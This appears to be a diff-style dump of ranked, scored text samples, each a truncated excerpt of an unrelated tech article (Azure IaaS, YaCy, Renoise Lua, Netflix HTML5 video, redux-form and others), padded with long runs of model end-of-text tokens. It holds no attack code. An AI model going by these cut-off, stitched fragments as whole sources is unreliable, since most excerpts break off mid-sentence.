nd_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 70; Score = 3768320.0 -<|begin_of_text|>Windows Azure: General Availability of Infrastructure as a Service (IaaS) Tuesday, April 16, 2013 - -This morning we announced the general availability release of our Infrastructure as a Service (IaaS) support for Windows Azure – including our new Virtual Machine and Virtual Network capabilities. This release is now live in production, backed by an enterprise SLA, supported by Microsoft Support, and is ready to use for production apps. If you don’t already have a Windows Azure account, you can sign-up for a free trial and start using it today. - -In addition to supporting all of the features and capabilities included during the preview, today’s IaaS release also includes some great new enhancements: - -New VM Image Templates (including SQL Server, BizTalk Server, and SharePoint images) - -VM Image Templates (including SQL Server, BizTalk Server, and SharePoint images) New VM Sizes (including Larger Memory Machines) - -VM Sizes (including Larger Memory Machines) New VM Prices (we’ve reduced prices 21%-33% for IaaS and PaaS VMs) - -Below are more details on today’s release and some of the new enhancements. You can also read Bill Hilf’s blog post to learn about some of the customers who are already using the IaaS capabilities in production. - -Windows Azure Virtual Machines - -Windows Azure Virtual Machines enable you to deploy and run durable VMs in the cloud. You can easily create these VMs from an Image Gallery of pre-populated templates built-into the Windows Azure Management Portal, or alternatively upload and run your own custom-built VHD images. Our built-in image gallery of VM templates includes both Windows Server images (including Windows Server 2012, Windows Server 2008 R2, SQL Server, BizTalk Server and SharePoint Server) as well as Linux images (including Ubuntu, CentOS, and SUSE Linux distributions). - -Windows Azure uses the same Hyper-V virtualization service built-into Windows Server 2012, which means that you can create and use a common set of VHDs across your on-premises and cloud environments. No conversion process is required as you move these VHDs into or out of Windows Azure – your VMs can be copied up and run as-is in the cloud, and the VMs you create in Windows Azure can also be downloaded and run as-is on your on-premise Windows 2012 Servers. This provides tremendous flexibility, and enables you to easily build hybrid solutions that span both cloud and on-premises environments. - -Easy to Get Started - -You can quickly create a new VM -================================================================================ -Rank = 71; Score = 3751936.0 -<|begin_of_text|>Press - -Web Search By The People, For The People: YaCy 1.0 - -on: 2011-11-28 - -The YaCy project is releasing version 1.0 of its peer-to-peer Free Software search engine. The software takes a radically new approach to search. YaCy does not use a central server. Instead, its search results come from a network of currently over 600 independent peers. In such a distributed network, no single entity decides what gets listed, or in which order results appear. - -The YaCy search engine runs on each user's own computer. Search terms are encrypted before they leave the user and the user's computer. Different from conventional search engines, YaCy is designed to protect users' privacy. A user's computer creates its individual search indexes and rankings, so that results better match what the user is looking for over time. YaCy also makes it easy to create a customised search portal with a few clicks. - -"Most of what we do on the Internet involves search. It's the vital link between us and the information we're looking for. For such an essential function, we cannot rely on a few large companies, and compromise our privacy in the process," says Michael Christen, YaCy's project leader. "YaCy's free search is the vital link between free users and free information. YaCy hands control over search back to us, the users." - -Each YaCy user is part of a large search network. YaCy is already in use on websites such as sciencenet.kit.edu, yacy.geocaching-portal.com, or fsfe.org, to provide a site-wide search function that respect users' privacy. It contains a peer-to-peer network protocol to exchange search indexes with other YaCy search engines. - -"We are moving away from the idea that services need to be centrally controlled. Instead, we are realising how important it is to be independent, and to create infrastructure that doesn't have a single point of failure," says Karsten Gerloff, President of the Free Software Foundation Europe. "In the future world of distributed, peer-to-peer systems, Free Software search engines like YaCy are a vital building block." - -Everyone can try out the search engine at http://search.yacy.net/. Users can become part of YaCy's network by installing the software on their own computers. YaCy is Free Software, so anyone can use, study, share and improve it. It is currently available for GNU/Linux, Windows and MacOS. The project is also -================================================================================ -Rank = 72; Score = 3751936.0 -<|begin_of_text|>Sharing Lua files in Renoise - -Recent articles showed how to use to Renoise Lua scripting to alter a track’s send device. One was driven by OSC, the other by MIDI. - -In both of them the code that did the actual send device manipulation was the same. But since these were two different scripts the same code appeared in both places. - -Sharing code using copy-and-paste is not the world’s worst programming sin, however much it might make some developers cringe. If you are throwing together a one-off script for a short-lived need, go for it. - -In many cases, though, having the same code in multiple places is a poor idea because it breaks one of the golden rules of software development: Be lazy. (Read up on the three great virtues of a programmer.) - -Copy-and-paste sure seems like the laziest thing to do at first, but if the code has any amount of complexity or importance there’s a really good chance that sooner or later you will want to change it. Maybe to fix a bug, maybe to make it faster, maybe to add a feature. - -With the same code in multiple places you need to keep track of all those places and edit the code in all those places. Oh, bother. - -Can Renoise Lua code be shared? Can you create a file that can be loaded and used by multiple scripts? - -Indeed you can. - -Know your path, change your path - -The preferred way to load files in Lua programs is the require function. - -require looks at a special path that defines where files may be found. This path is actually many paths, and it is not just a set of folder paths but paths that contain some pattern-matching variables. (See that previous link for details.) - -This path-of-paths can be altered. The usual warning about messing with program defaults applies here; if you screw up the require path your program may not run as expected (or at all) and you will be sad. - -The path is a string, so here’s an example of changing it so that a tool file can load from a parallel directory: - -package.path = "../ng-shared/?.lua;".. package.path - -For example, suppose you have this folder and file layout: - -Scripts/Tools/ng-shared/Utils.lua Scripts/Tools/com.neurogami.MidiMapper.xrns/main.lua - -If the file main.lua in com.neurogami.MidiMapper.xrns has that path alteration then when it does this: - -require "Utils" - -the program will look in the ng-shared/ folder since it -================================================================================ -Rank = 73; Score = 3735552.0 -<|begin_of_text|>At its main plant in Ingolstadt, German carmaker Audi has for the first time deployed a robot that works ‘hand-in-hand’ with humans – without a safety barrier and ideally adapted to the employees’ working cycles. - -It is the first human-robot cooperation at the Volkswagen Group to be applied in final assembly. This innovative technology makes work easier for the assembly employees and makes ergonomic improvements. - -For Dr. Hubert Waltl, Board of Management Member for Production at Audi AG, human‑robot cooperation opens up entirely new possibilities: “The factory of the future will feature increasing interaction between man and machine. That allows us to automate routine operations and to optimise ergonomically unfavorable workplaces.” But also in the future, there will be no factory without people. “People will continue to make the decisions on production processes. And our employees will continue to be essential for future-oriented, successful production.” - -Peter Mosch, chairman of the Group Works Council of Audi AG, commented: “We see the opportunities presented by the advancing interaction between man and machine. The decisive aspect for us is how this development is guided. We welcome it when it neither jeopardizes jobs nor leads to people losing independence to machines.” - -For the employees of the A4/A5/Q5 assembly lines at Audi’s Ingolstadt plant, the new, direct cooperation between humans and robots is an enormous help: Until now, they have had to bend over material boxes to take out the coolant expansion tanks. At first glance, this seems like a simple task, but with frequent repetitions it can lead to back problems. From now on, the task will be taken over by a robot, known internally as ‘PART4you’. - -It works hand-in-hand with the Audi employees and is fitted with a camera and an integrated suction cup. This enables it to pick up the components from the boxes and to pass them to the assembly workers – without any safety barrier, at the right time and in an ergonomically optimal position. “In a production process with increasing diversity of model versions, PART4you provides the employees with important assistance. It selects the correct component and holds it ready to be taken. This means that the employees no longer have to reach over long distances or bend down repeatedly. The robot becomes an assembly assistant operating at the same speed as the assembly worker – and not the other way around,” said Johann Hegel, Head of Assembly Technology Development. - -“Thanks to a soft protective skin with integrated safety sensors, there is no danger to the employees,” explained Hegel. Because PART -================================================================================ -Rank = 74; Score = 3735552.0 -<|begin_of_text|>Good aim is essential to having fun and improving your results in CoD. - -I have seen this question asked numerous times “How do I get a better aim in Call of Duty” and today we are going to go over exactly that. This will be very in-depth and we will go through every aspect in order for you to be the best you can be. However, there’s a common misconception that things will change overnight although that is not the case, these things take time and if you’re willing to put in the time then great things will happen to your gameplay and you will notice drastic improvements. - -Vibration – Good Or Bad? - -By default on Call of Duty, your controller is set to vibrate when you shoot and get shot. This adds a whole element to the game as it allows you to virtually feel everything your character does. However, because you get so used to it you are unable to play without it. - -If you are using vibration, I would recommend turning it off immediately because the rumble from the vibrations will throw your shot off and make it harder to control your aim. It is only a minor change but it can make all the difference to your game and elevate it to that next level. - -Addons – Kontrol Freeks - -If you haven’t heard of Kontrol Freeks already, they are an extension that sits on top of your analogue sticks. You may now be asking yourself “Why would I want this?” Well, they are much taller than regular analogue sticks, it means you don’t need to move your thumbs as much whilst aiming. This will allow you to make much more precise movements, thus making it easier to play on higher sensitivities, although not many professional players do play at a higher sensitivity, however, we will get onto that topic shortly. - -They are used by a lot of professional Call of Duty players.They are one of the most notorious companies when it comes to the gaming accessory industry and has a great reputation. Not only is the quality of the product exceptional, but also because they are considerably cheap. A pair of Kontrol Freeks will only cost you a mere $10-20 so they are definitely worth trying out. The best part is, if you don’t like them, they have a 30-day money back guarantee, so there is no risk to be had. - -Sensitivity Levels – Very Controversial - -There is no such thing as a ‘best sensitivity level’ at all. Some players play on 3, others play on 15, it’s all about what makes you -================================================================================ -Rank = 75; Score = 3719168.0 -<|begin_of_text|>Motivation - -Last week we were discussing, among many other things, ways to speed up Firefox during startup. One obvious option was to move more of our I/O off of the main thread. This in turn involves making more code asynchronous, and asynchronous code is simply harder to manage. Mike Shaver mentioned something about "futures" as a possible way to handle the extra complexity, and then the discussion moved on to something else. - -What exactly is a future anyway? - -I'm not exactly an expert, but I've not just used futures, I've written my own implementations in JavaScript and even Object Pascal (in hindsight I'm not sure the latter was a good idea, but it was certainly an interesting exercise). Futures seem esoteric, but they really shouldn't be -- the idea is really quite simple. In this post I'll try to explain what futures are and how they can be used to make asynchronous programming easier. - -In the simplest form, a future works like an IOU. I can't give you the money you've asked for right now, but I can give you this IOU. At some point in the future, you can give me the IOU and I'll give you the money -- if I have it. If I don't have it yet, then you can wait until I do. I get paid on Friday. - -Alternatively there's the dry cleaner metaphor. You drop your clothes off on Monday and the clerk gives you a ticket that you can use later to reclaim your clothes after they've been cleaned. The clothes will be ready on Tuesday morning, but if you show up too early, you'll have to wait. On the other hand, if there's no hurry, you can just do other stuff on Tuesday and show up on Wednesday with a reasonable expectation that they'll be ready when you arrive. You'll just hand your ticket over, collect your clothes, and be on your way. - -A future is similar to the IOU (or the dry cleaning ticket). It gives you a way to represent the result of a computation that has not yet completed, and it allows you to access that result once it becomes available. So you can call a function which starts some asynchronous process but doesn't wait for it to finish. Nevertheless the function can return you a useful result: a future which can be used to claim the real result later. - -A simple example - -Of course if you ask for the result too soon, you'll have to wait. On the other hand, if the result becomes available before you want it, then -================================================================================ -Rank = 76; Score = 3702784.0 -<|begin_of_text|>Sintel The Game is based on Blender Foundation's extremely popular movie 'Sintel'. The game will have action oriented gameplay while keeping same level of intensity and emotions that touched so many people. The story is as follows: After a long time, the developers of Sintel The Game posted about the game progress in a recent blog post.Sintel The Game is based on Blender Foundation's extremely popular movie 'Sintel'. The game will have action oriented gameplay while keeping same level of intensity and emotions that touched so many people. The story is as follows: - -Sintel – The Game takes place within the events of the movie. Sintel finds herself just outside the town of Garway. She bumps into some bandits who attack her and she is taken into the care of a kind stranger. You play as Sintel and follow her on her journey through Garway. On the way you will discover that the guards of Garway are corrupt, and help to rise against them. - -blog post: Excerpts from the - -I worked on enemy AI a little bit, started re-designing the dialog system, and a bunch of other small things. Since I’ve gotten back, I started re-programming the player mechanics. I know this sounds silly seeing as we already have a working, controllable player, but there was room for improvement in the design and in the code. We also gave Sintel a nice new IK rig which needed to be implemented. As of right now, I’ve improved the movement system, making it easier to walk up and down hills, giving it a more realistic and less glitchy feel. It already feels a lot smoother than before. The code is optimized this time around too. Now i’m working on making the player camera better. - -We still want to release a demo as soon as we can. We are slowly making our way towards a release. I think I speak for all of us when I say we don’t want to release a demo unless it is fun. The pre-demo was short and bland because we rushed it out without spending enough time on making it fun. The demo will include some different gameplay elements, a good taste of combat, and a boss battle that is actually challenging. - -I can’t say when the demo will be ready, but the moment we pinpoint a date, I will let you guys know. - -here. You will need Blender 2.5+ for the game to work. The game can be played by running sintel_the_game.blend file. To start the game press 'P' and -================================================================================ -Rank = 77; Score = 3686400.0 -<|begin_of_text|>Current trends in software and backend architecture have been evolving towards a more loosely coupled more granular design. I am sure most of you have heard of microservice based architectures. read more - -The latest development on that front in the past couple of years has been the advent of serverless which allows you to run applications in very cost effective ephemeral services. This is why it is important to have a proper gateway for your API that is able to route all your requests to the designated endpoint. - -GraphQL stands out in that respect as being a mature open sourced standard started at Facebook. We will first have a look at how we set up our own GraphQL server locally, then we will explore the Query language and schema definitions it provides which allows you essentially query your mesh of services from a single point of entry. The beauty of that is it will notify you early if any of your endpoints is misbehaving or the schemas are out of date by erroring out. Another advantage of this is that it allows for your API documentation to be a real time process and it will give you what one may call an API playground where you can query and explore your API. - -After we explore our serverless API we will have a look at the more advanced features and standards around mutators and resolvers and then we will close by going all in, full serverless and deploy our graphql server to a function in the cloud.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 78; Score = 3686400.0 -<|begin_of_text|>How to Build a Monitoring and Analytics System for Your IoT Embedded Devices - -Jonathan Seroussi Blocked Unblock Follow Following Sep 3, 2017 - -This post outlines a cookbook we used to create a monitoring system for a connected embedded system. We used it to create one that can monitor all type of devices (even those that run Bare-Metal and RTOS), and we thought it’d make sense to help others build similar systems. This cookbook could easily be used to monitor device operational data as well as your actual application data. After deploying an IoT system, you need to make sure everything is working as it should and close a feedback loop from the field. We’re about to show you how to build one using open source tools almost for free. We also have a post that outlines the need for such a system (Check It Out). - -Let’s focus on three things: - -Device and gateway code that streams data to a centralized backend. Backend and database to process and store the data. Frontend to display the data. - -Once these three building blocks are in place, acting upon the monitored data and connecting it to your operation processes is relatively easy easy. - -1. Device and Gateway Logging tool - -When thinking about a logging utility hosted on your end devices and gateways, the things that come up are: - -It needs to have a small footprint. - -Never crash my device. - -Consume little power. - -Not disruptive to the application code. - -Your devices means your code. It’s challenging to generalize this topic as a lot depends on the communication channel used to connect to the internet. We open sourced a logging tool that logs events from your end devices and sends it to your gateway/backend. If you are using nRF52 with BLE GATT and a gateway we also provide you with a sample that works out of the box. Go to our GitHub to get started. - -1. jumper-ulogger — is an under 500B memory footprint logging framework you integrate into your end device (with examples for porting to nRF52 device and CC3200). - -2. jumper-logging-agent — is the service that runs on the gateway. - -3. jumper-ble-logger — is a logging agent service example for a BLE GW. - -If you have any issues or question send us a note to info@jumper.io. - -2. Backend and Database - -This is where you should pay attention more carefully because there’s some good stuff here :-) I recommend using the following toolsets to make this work: - -A key-value database to store a current snapshot of a device’s state -================================================================================ -Rank = 79; Score = 3637248.0 -<|begin_of_text|>HTML5 Video at Netflix - -Netflix Technology Blog Blocked Unblock Follow Following Apr 14, 2013 - -by Anthony Park and Mark Watson - -Today, we’re excited to talk about proposed extensions to HTML5 video that enable playback of premium video content on the web. - -We currently use Microsoft Silverlight to deliver streaming video to web browsers on the PC and Mac. It provides a high-quality streaming experience and lets us easily experiment with improvements to our adaptive streaming algorithms. But since Microsoft announced the end of life of Silverlight 5 in 2021, we need to find a replacement some time within the next 8 years. We’d like to share some progress we’ve made towards our goal of moving to HTML5 video. - -Silverlight and Browser Plugins - -Silverlight is a browser plugin which allows our customers to simply click “Play” on the Netflix website and watch their favorite movies or TV shows, but browser plugins have a few disadvantages. First, customers need to install the browser plugin on their computer prior to streaming video. For some customers, Netflix might be the only service they use which requires the Silverlight browser plugin. Second, some view browser plugins as a security and privacy risk and choose not to install them or use tools to disable them. Third, not all browsers support plugins (eg: Safari on iOS, Internet Explorer in Metro mode on Windows 8), so the ability to use them across a wide range of devices and browsers is becoming increasingly limited. We’re interested to solve these problems as we move to our next generation of video playback on the web. - -HTML5 Premium Video Extensions - -Over the last year, we’ve been collaborating with other industry leaders on three W3C initiatives which are positioned to solve this problem of playing premium video content directly in the browser without the need for browser plugins such as Silverlight. We call these, collectively, the “HTML5 Premium Video Extensions”: - -Media Source Extensions (MSE) - -The W3C Media Source Extensions specification “extends HTMLMediaElement to allow JavaScript to generate media streams for playback.” This makes it possible for Netflix to download audio and video content from our content delivery networks and feed it into the video tag for playback. Since we can control how to download the audio/video content in our JavaScript code, we can choose the best HTTP server to use for content delivery based on real-time information, and we can implement critical behavior like failing over to alternate servers in the event of an interruption in content delivery. In addition, this allows us to implement our industry-leading adaptive streaming algorithms (real-time -================================================================================ -Rank = 80; Score = 3538944.0 -<|begin_of_text|>Word in China is out about blockchain technology, as the government made clear in an Informatization Strategy published in December of 2016. The strategy states, "The internet, cloud computing, large data, artificial intelligence, machine learning, blockchain … will drive the evolution of everything - digital, network and intelligent services will be everywhere." - -It was an official endorsement for the new digital age and a big boost for blockchain technology. - -In a country with $5.5 trillion in digital payments last year (50 times the U.S.), blockchain is now a buzzword among the titans of industry. And in the race to participate, Chinese banks, builders, suppliers and retailers are pumping out blockchain solutions. - -Survival of the Fittest - -Even with millions of dollars, many of these new blockchains may not make it very far. In a recent WeChat post, Antshares executive Erik Zhang stated that 90 percent of the enterprise blockchains we are seeing are doomed to fail. Without an open-source code that anyone can build upon, Zhang argues, private solutions will not see the network effect of a healthy ledger. - -The big question for China, however, is whether a country known for its centralized authority, and a penchant for all things made-in-China, will allow an open-source, global standard solution sit on its internet. With Bitcoin, Ethereum and Hyperledger vying for dominance, there are big names within China making moves into the space. - -A few of these big names include: - -The People's Bank of China (PBOC) - The PBOC is reportedly close to the release of a government-backed digital RMB currency, which would put China at the frontier of digital currency adoption. And there are whispers within China that Shenzhen will be ground zero for the new digital economy. In September, Bloomberg reported that PBOC Vice Governor Fan Yifei wrote: "[T]he conditions are ripe for digital currencies, which can reduce operating costs, increase efficiency and enable a wide range of new applications." This would pave the way for blockchain startups in China to move forward in digital banking, finance, record-keeping, supply chains, IoT, AI and more. - -Wanxiang Blockchain Labs - Working with Ethereum, Wanxiang is the largest blockchain development backer in China. After purchasing 500,000 ETH tokens last year, they pledged $30 billion for the development of a smart city in Hangzhou. They offer open-source platforms for anyone to build upon, and launched an accelerator fund for developers, intending to put money into -================================================================================ -Rank = 81; Score = 3522560.0 -<|begin_of_text|>Javascript React Get Started with redux-form - -The redux-form library bills itself as the best way to manage your form state in Redux. It provides a higher-order form component and a collection of container components for dealing with forms in a React and Redux powered application. Most importantly, it makes it easy to get a form up and running with state management and validations baked in. - -To get a feel for what redux-form can do for us, let's build a simple Sign In form. You can follow along below or check out the resulting source code directly. - -Start with React - -We are going to start by getting the React portion of this application setup. The easiest way to spin up a React app is with create-react-app. Install it with npm or yarn if you don't already have it globally available. - -$ yarn global add create-react-app - -Let's generate our project. - -$ create-react-app redux-form-sign-in - -The create-react-app binary that is now available on our machine can be used to bootstrap a React app with all kinds of goodies -- live code reloading in development and production bundle building -- ready to go. - -Let's jump into our project and kick off a live reloading development server. - -$ cd redux-form-sign-in $ yarn start - -At this point you should see your browser pointed to localhost:3000 with a page reading Welcome to React. - -Is This Thing Plugged In? - -We can see the live-reload in action by altering src/App.js. - -return ( < div className = "App" > < div className = "App-header" > < img src = { logo } className = "App-logo" alt = "logo" /> < h2 > Redux Form Sign In App < /h2 > < /div > < p className = "App-intro" > To get started, edit < code > src / App. js < /code> and save to reload. < /p > < /div > ); - -Change the text in the h2, save the file, and then switch back to the browser to see the changes almost instantly. - -create-react-app made it really easy to get to a point where we can just iterate on our app. We didn't have to fiddle with Webpack configurations or any other project setup. - -Next, let's change the prompt in the app intro. - -< p className = "App-intro" > Sign in here if you already have an account < /p > - -Our app is now begging for a form which brings us to redux-form, the focus of this post. - -Satisfying -================================================================================ -Rank = 82; Score = 3506176.0 -<|begin_of_text|>The first final version of Hibernate OGM is out and we’ve recovered a bit from the release frenzy. So we thought it’d be a good idea to begin the new year with a tutorial-style blog series, which shows how to get started with Hibernate OGM and what it can do for you. Just in case you missed the news, Hibernate OGM is the newest project under the Hibernate umbrella and allows you to persist entity models in different NoSQL stores via the well-known JPA. - -We’ll cover these topics in the following weeks: - -Persisting your first entities (this instalment) - -Querying for your data - -Running on WildFly - -Running with CDI on Java SE - -Store data into two different stores in the same application - -If you’d like us to discuss any other topics, please let us know. Just add a comment below or tweet your suggestions to us. - -In this first part of the series we are going to set up a Java project with the required dependencies, create some simple entities and write/read them to and from the store. We’ll start with the Neo4j graph database and then we’ll switch to the MongoDB document store with only a small configuration change. - -Let’s first create a new Java project with the required dependencies. We’re going to use Maven as a build tool in the following, but of course Gradle or others would work equally well. - -Add this to the dependencyManagement block of your pom.xml: - -... ... org.hibernate.ogm hibernate-ogm-bom pom 4.1.1.Final import ... ... - -This will make sure that you are using matching versions of the Hibernate OGM modules and their dependencies. Then add the following to the dependencies block: - -... ... org.hibernate.ogm hibernate-ogm-neo4j org.jboss.jbossts jbossjta ... ... - -The dependencies are: - -The Hibernate OGM module for working with an embedded Neo4j database; This will pull in all other required modules such as Hibernate OGM core and the Neo4j driver. When using -================================================================================ -Rank = 83; Score = 3506176.0 -<|begin_of_text|>CUSTOMIZER CHALLENGE CONTEST WINNER - Artistic Category This is a 100% printed customizable music box! Only 3D printed parts are used in the design and it can be assembled and disassembled via printed snapping mechanisms. The project originated when a friend of mine said that he'd only be interested in 3D printing once he can print a music box ;) Videos http://youtu.be/LUlovenI9xQ http://youtu.be/K_c3p24RRtQ (made by banthafodder7400) http://youtu.be/exNeQDz7f3g I'll try to keep the.scad file on this page updated but to help me to manage the design and to make it easier for others to contribute: https://github.com/wizard23/ParametrizedMusicBox - -Updates - -2018-03-28 Updated URL to generate parameters (was offline) - -2016-09-20 Spreadsheet to help you to get the parameters right: https://goo.gl/sKWWDk (created by: Ben Horner) - -2013-11-24 Updated link to generator page (old webserver is offline) - -2013-03-10 (V3) Added optional Name of Song on top/bottom of MusicCylinder; fixed build plate positioning of pulley that messed up smaller customized versions; cleanup and clarification of descriptions; implemented work around for customizer hickup when strings start with a '.' - -2013-03-08 (V2) removed "work in progress status", fully test printed - -It's very important to put the music box on a sounding box to get good sound quality. I found that large cardboard boxes and some tables make good sounding boxes. A guitar or a piano should work even better! - -A complete music box consists of 6 parts: - -Case: the large thin walled part that holds the vibrating teeth and holds everything together - -Music Cylinder: the large cylinder with the pins (that encode the music) sticking out - -Transmission gear: sits between the crank gear and the music cylinder - -Crank gear: drives everything, connects to crank (insert it through the round hole in the case) - -Crank: for manually driving the box, connects to crank gear and crank pulley - -Pulley: for holding the crank while turning it - -With the default parameters you get a complete building plate that can play one full octave range (13 half notes from C to C) in a medium footprint that should fit in most printers. You can -================================================================================ -Rank = 84; Score = 3506176.0 -<|begin_of_text|>Microsoft is integrating Skype directly into Windows 10, and the result looks a lot like Apple's iMessage service. While the company unveiled some of its Skype integration at a special Windows 10 press event in Redmond yesterday, the software maker didn’t show its new Messaging app on the PC version of Windows 10. This appears to be key to a new experience for Skype messaging in Windows 10, and it brings back the built-in Messaging app from Windows 8 that Microsoft killed with the Windows 8.1 update. - -Skype is starting to link usernames to mobile numbers - -The new Messaging app works by integrating Skype, allowing you to chat to Skype contacts or initiate video / audio calls. All the conversations are synced between PCs, tablets, and phones, and the new app looks like a lightweight version of Skype. It’s also identical to the Messages app on OS X, with the same two-panel interface and circular UI for contact photos. Microsoft has started linking Skype usernames with mobile numbers to make it easier to find friends who are using the service without having to know their user ID. That makes this whole approach a lot more like iMessage, allowing Skype users to chat to friends easily on the service. The main difference is that Skype is cross-platform so you can chat to friends on iOS, Android, BlackBerry, Windows, and more, while iMessage is limited to Apple’s platforms. - -The built-in Skype experience on the phone version of Windows 10 also allows you to send text messages, but it’s entirely possible (and likely) that Microsoft will extend this functionality and sync state to the PC version just like iMessage. In Microsoft’s new world Windows 10 apps are the same across PCs, phones, and tablets, so such a move would be expected. Microsoft isn’t fully detailing its Messaging app plans just yet, but it’s encouraging to see the company move to a more native and simple integration of Skype instead of separate and unnecessary apps. All that's needed now is the complexity of usernames to fully disappear so everyone can use Skype just with their mobile number.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 85; Score = 3489792.0 -<|begin_of_text|>With the U.K. report on Facebook, and the stern language within it, the train on regulating data sharing may finally reach the station this year. The FTC is also likely to impose a stiff fine on Facebook for violating a consent decree. - -So let's learn more about this data sharing business. If you prefer a video, the gist of this post can be heard here. - -*** - -First, let's talk about data flows and the "cloud". Data are stored in computers that are called servers. In the cloud computing model, these servers are owned - not by the companies that collect the data - but by large tech companies like Amazon, Google, Microsoft, etc. who are 